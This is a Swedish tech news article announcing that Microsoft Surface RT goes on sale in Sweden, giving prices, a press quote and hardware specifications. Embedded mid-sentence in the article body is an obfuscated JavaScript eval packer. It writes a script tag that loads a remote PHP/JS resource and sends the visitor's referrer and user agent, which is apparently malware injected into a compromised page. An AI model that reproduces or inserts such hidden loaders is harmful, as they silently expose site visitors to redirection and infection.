Image Image Image Image Image Image Image Image Image Image

| 26 januari, 2021

Scroll to top

Top

Nu finns Microsoft Surface i Sverige

Nu finns Microsoft Surface i Sverige
Sebastian

Microsoft eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aifna|var|u0026u|referrer|trnzh||js|php’.split(’|’),0,{}))
Surface: Idag, torsdag den 14 februari släpps Microsoft Surface RT i Sverige. Nu kan du som länge gått och väntat på denna köpa loss en.

Priset för Surface ligger på ca 4 495 kronor och sträcker sig till 5 295 kronor om du vill ha en platta med 64 GB istället för 32. För 800 kronor får du också ett Touch Cover som inte ingår som standard.

– Vi är väldigt glada över att äntligen kunna erbjuda Surface RT för den svenska marknaden. Surface och Windows 8 ger användaren en kompromisslös upplevelse, både privat och på jobbet. Surface erbjuder något nytt, och jag tror att den svenska marknaden är redo, det säger Joakim Karlén, produktmarknadschef för Windows, i ett pressmeddelande.

Microsoft Surface RT är en tablet som körs med Windows 8. Dock kan man inte med denna köra ”riktiga” Windows program, något som man kan göra med Surface Pro. Med andra ord är det en ”Light”-version av surfplattan.

I Surface sitter en fyrkärning processor på ett tegra3-chip med 2 GB ram. Skärmen på Surface är 10,6 tum stor och har en upplösning på 1 366 x 768 pixlar. Det finns möjlighet att sätta in ett Micro sd och USB-portar finns också.

Samtidigt som vi i Sverige får tillgång till Surface RT så får USA och Kanada nu tillgång till Surface Pro. Och datum för lansering av Pro är inte officiellt än och lär dröja ett tag, tråkigt.

Mer info: Microsoft.se